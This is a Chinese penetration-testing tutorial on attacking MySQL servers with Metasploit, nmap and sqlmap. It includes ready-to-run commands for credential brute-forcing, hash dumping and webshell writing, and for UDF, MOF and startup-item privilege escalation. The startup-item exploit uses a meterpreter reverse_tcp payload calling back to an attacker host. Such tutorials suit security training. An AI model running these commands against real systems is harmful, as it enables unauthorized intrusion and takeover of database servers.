【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

这篇具有很好参考价值的文章主要介绍了【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

Metasploit模块

sqlmap

1.2、第二步:获取服务器权限(爆破)

MySQL 口令爆破

哈希值爆破

泄露的源码中寻找数据库密码

向服务器写WebShell

1.3、第三步:提权

UDF提权(UDF提权)

Mof提权

MySQL启动项提权

1.4、第四步:MySQL 0day 漏洞


一、渗透攻击MySQL

1.1、第一步:信息收集

db_nmap扫描(内置、外置都可)

目标发现


-iL        #添加扫描ip列表文件
-iR        #随机选择目标
           #不用指定目标ip,nmap对全球的ip随机选择100个进行扫描
--exclude  #排除扫描
主机发现


-sn     #ping扫描,不扫描端口
-Pn     #完全扫描(穿透防火墙)
-PS/PA/PU/PY[portlist]   #协议扫描,TCP、SYN/ACK、UDP、SCTP ,基于上述协议扫描端口
-PO[protocol list]       #使用ip协议扫描
-n/-R
-n:   #不进行nds解析
-R:   #对其进行反向解析
--dns-servers    #更换DNS服务器为得到不同的扫描结果
--traceroute     #路由追踪,等同于traceroute命令
端口发现

-sS/sT/sA/sW/sM   #基于TCP的端口发现(SYN全连接 ACK窗口 Maimon扫描)
-sU         #基于UPD协议的扫描,但是UDP的扫描的准确率并不高
-sN/sF/sX   #基于TCP的空/finish/xmas的扫描
--scanflags <flags>  #对TCP的扫描,是对tcpflags位的组合,可以自定义组合
-sI         #僵尸扫描
-sY/sZ      #基于SCTP协议(少用)
-b          #基于FTP的中继扫描
端口和扫描菜单

-p     #扫描特定类型端口/范围
--exclude-ports  #排除不需扫描的端口范围
-F     #快速扫描
-r     #按顺序扫描
namp默认每次扫描中随机选择(常用端口的top n),-r会使namp按照从大到小的顺序进行

服务/版本探测

-sV
--version-intensity
--version-trace
对扫描过程进行跟踪,显示扫描的具体过程

Metasploit模块

 #获取MySQL相关信息
auxiliary/admin/mysql/mysql_enum
auxiliary/scanner/mysql/mysql_version

 #文件枚举和目录可写信息枚举
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs

sqlmap

通过注入点利用,获取数据库相关信息

1.2、第二步:获取服务器权限(爆破)

如果目标服务器开启3389端口,并且允许远程访问,可以采取爆破MySQL用户密码,获取MySQL的权限

MySQL 口令爆破

爆破成功的几率很低几乎为零,除非管理员用的是弱口令。通过社工可以提高一定成功率,通过收集各种信息,例如姓名、社交平台账号/昵称、手机号、生日、伴侣姓名/生日、职业等信息,通过信息生成针对性的字典,利用该字典进行爆破

1、metasploit相关模块爆破

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.x.x
set pass_file /tmp/wordlists.txt    # 设置字典
set username root
run
2、nmap扫描并破解

nmap --script=mysql-brute.nse <ip> -p 3306

自定义账号、密码
nmap  --script=mysql-brute.nse userdb=/tmp/passdb.txt passdb=/tmp/pass.txt 192.168.1.13 -p 3306

检查mysql root空口令
nmap --script=mysql-empty-password.nse <ip>

哈希值爆破

auxiliary/scanner/mysql/mysql_hashdump

导出在当前登陆用户权限下可以查看账户的密码hash

泄露的源码中寻找数据库密码

网站的配置文件中大多含有数据库的连接配置,如数据库用户名、密码等配置信息

eg:config  connect等

向服务器写WebShell

前提:存在sql注入漏洞、当前用户具有写入权限、目标网站Web物理路径、secure_file_priv 选项支持数据导出

高版本的MYSQL添加了secure_file_priv,对导出文件做了限制:

1、输出目录路径应该secure_file_priv值一致,才能导出。

2、若其值为空,则无限制。

3、值为 NULL 时,表示不允许导入或导出

1.3、第三步:提权

UDF提权(UDF提权)

use exploit/multi/mysql/mysql_udf_payload
set rhosts 192.168.x.x
set username root
set password root
run

MSF会将一个随机命名的UDF文件写入lib/plugin目录下(该目录不存在,则无法成功),该UDF文件中包含sys_exec()和sys_eval()这两个函数,但是默认只创建sys_exec()函数,该函数执行不会有回显。
可以手动引入 sys_eval() 函数,来执行有回显的命令
create function sys_eval returns string soname 'guuHCUiK.dll';

Mof提权

exploit/windows/mysql/mysql_mof

MySQL启动项提权

use exploit/windows/mysql/mysql_start_up
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.x.x
set lport 4444
set rhosts x.x.x.x
set username root
set password root
set startup_folder xxx     # 根据目标系统进行设置自启目录
run

1.4、第四步:MySQL 0day 漏洞

网上查询了去利用文章来源地址https://www.toymoban.com/news/detail-475606.html

到了这里,关于【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(41)
  • 进入黑客的世界:Kali Linux 中的 Metasploit 渗透测试利器

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2024年02月06日
    浏览(48)
  • [课业] | 软件安全 | 使用渗透性工具Metasploit进行漏洞测试

    1.1 渗透测试技术的核心思想 渗透测试(Penetration Test)技术的核心思想是模仿黑客的特定攻击行为,也就是尽可能完整地模拟黑客使用的漏洞发现技术和攻击手段,对目标的安全性做深入的探测,发现系统最脆弱环节的过程。 渗透测试可以选择使用自动化测试工具,测试人员的

    2024年02月04日
    浏览(59)
  • 《Kali渗透基础》16. 密码攻击

    本系列侧重方法论,各工具只是实现目标的载体。 命令与工具只做简单介绍,其使用另见《安全工具录》。 本文以 kali-linux-2023.2-vmware-amd64 为例。 身份认证:证明你是你声称的那个人。 非授权用户不受信任,认证用户可以访问相关资源。 认证类型: 你知道什么(账号密码

    2024年01月18日
    浏览(46)
  • 渗透测试 ---利用Kali进行简单的信息收集

    目录 Kali环境安装配置更新 Linux镜像文件下载地址 默认用户名 更新命令 网络环境配置 二层发现 原理 工具 arping netdiscover 三层发现 原理 工具 ping fping hping3 四层发现 原理 工具 nmap hping3 Python脚本 端口扫描 原理 工具 nmap Dmitry netcat 端口Banner信息获取 原理 工具 nmap dmitry netcat

    2024年02月05日
    浏览(55)
  • 利用kali Linux 渗透windows 操作系统

    利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(

    2024年02月05日
    浏览(50)
  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(44)
  • 如何利用Kali Linux进行网站渗透测试:最常用工具详解

    数据来源: ChatGPT         Kali Linux 2022.4虚拟机中自带了大量渗透测试工具,涵盖了信息收集、漏洞利用、口令破解、漏洞扫描等多个方面。         使用方法只能当做参考, 详细的使用教程: 建议您在搜索引擎上输入相关,例如: \\\"Kali Linux 工具名 中文教程

    2024年02月06日
    浏览(50)
  • [渗透测试]—6.2 无线网络安全漏洞和攻击技术

    在本章节中,我们将学习一些常见的无线网络安全漏洞和攻击技术,如WPS漏洞、Evil Twin攻击等。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。 Wi-Fi保护设置(WPS)是一种简化无线网络配置的技术,可以通过输入PIN码或按下物理按钮的方式快速连接无线网络。然

    2024年02月11日
    浏览(51)
  • 渗透测试--2.漏洞探测和利用

    目录 一.漏洞分类 二.漏洞探测 三.漏洞利用 四.漏洞扫描 1.Nessus 2.Web应用漏洞扫描器——DVWA 五.Metasploit漏洞利用 网络漏洞 系统漏洞 应用漏洞  人为不当配置 渗透测试是一种测试网络、应用程序和系统安全性的方法,旨在发现并利用漏洞和安全漏洞,以评估系统的安全性。

    2024年02月05日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包